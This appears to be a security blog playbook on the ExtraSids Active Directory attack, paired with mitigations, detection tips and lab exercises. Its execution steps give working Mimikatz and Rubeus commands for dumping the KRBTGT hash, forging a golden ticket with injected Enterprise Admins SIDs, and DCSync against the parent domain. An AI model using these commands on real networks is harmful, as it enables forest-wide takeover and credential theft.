Overview

The ExtraSids attack is a technique that allows an attacker to compromise a parent domain from a compromised child domain within the same Active Directory Forest. This playbook provides a comprehensive guide for understanding, executing, and defending against this attack.

Key Concepts

• SID History: An attribute used in migration scenarios to retain a user’s original SID when moved to a new domain.
• SID Filtering: A protection mechanism that filters out authentication requests from domains in other forests across a trust.
• Golden Ticket: A forged Kerberos ticket granting unrestricted access within an Active Directory domain.

Prerequisites

To perform the ExtraSids attack, the following information is required:

1. KRBTGT hash for the child domain
2. SID of the child domain
3. Name of a target user in the child domain (can be non-existent)
4. FQDN of the child domain
5. SID of the Enterprise Admins group of the root domain

Attack Execution

Step 1: Gather Required Information

1. Obtain the KRBTGT account’s NT hash using DCSync:

mimikatz # lsadump::dcsync /user:CHILD_DOMAIN\krbtgt

2. Get the child domain SID:

PS C:\> Get-DomainSID

3. Obtain the Enterprise Admins group SID:

PS C:\> Get-DomainGroup -Domain PARENT_DOMAIN -Identity "Enterprise Admins"

Step 2: Create Golden Ticket

Using Mimikatz:

mimikatz # kerberos::golden /user:hacker /domain:CHILD_DOMAIN /sid:CHILD_DOMAIN_SID /krbtgt:KRBTGT_HASH /sids:ENTERPRISE_ADMINS_SID /ptt

Using Rubeus:

Rubeus.exe golden /rc4:KRBTGT_HASH /domain:CHILD_DOMAIN /sid:CHILD_DOMAIN_SID /sids:ENTERPRISE_ADMINS_SID /user:hacker /ptt

Step 3: Verify Ticket Creation

PS C:\> klist

Step 4: Exploit Access

Test access by performing actions such as listing the C: drive of the parent domain’s DC or executing a DCSync attack:

PS C:\> ls \\PARENT_DC\c$

mimikatz # lsadump::dcsync /user:PARENT_DOMAIN\target_user

Mitigation Strategies

1. Implement SID Filtering on trust relationships
2. Regularly audit and monitor privileged accounts
3. Adopt the Enhanced Security Administrative Environment (ESAE) architecture
4. Implement comprehensive security controls and conduct regular audits
5. Consider implementing a “Red Forest” architecture

Detection Methods

1. Monitor for unusual SID History modifications
2. Look for unexpected domain controller impersonation
3. Implement advanced threat detection solutions for Active Directory

Additional Resources

1. The Hacker Recipes – Trusts
2. Atomic Red Team – SID-History Injection
3. Defending Against Golden Ticket Attacks
4. Understanding DCSync Attacks
5. Comprehensive Domain Trust Exploitation Guide
6. SID History Injection Exposure

Practical Exercises

1. Set up a lab environment with a parent and child domain. Compromise the child domain and perform the ExtraSids attack.
2. Implement SID Filtering on the trust between domains and attempt the attack again to observe mitigation effectiveness.

Remember to use this playbook for educational and authorized testing purposes only. Always obtain proper permissions before conducting security assessments in production environments.

For more insightful and engaging write-ups, visit kosokoking.com and stay ahead in the world of cybersecurity!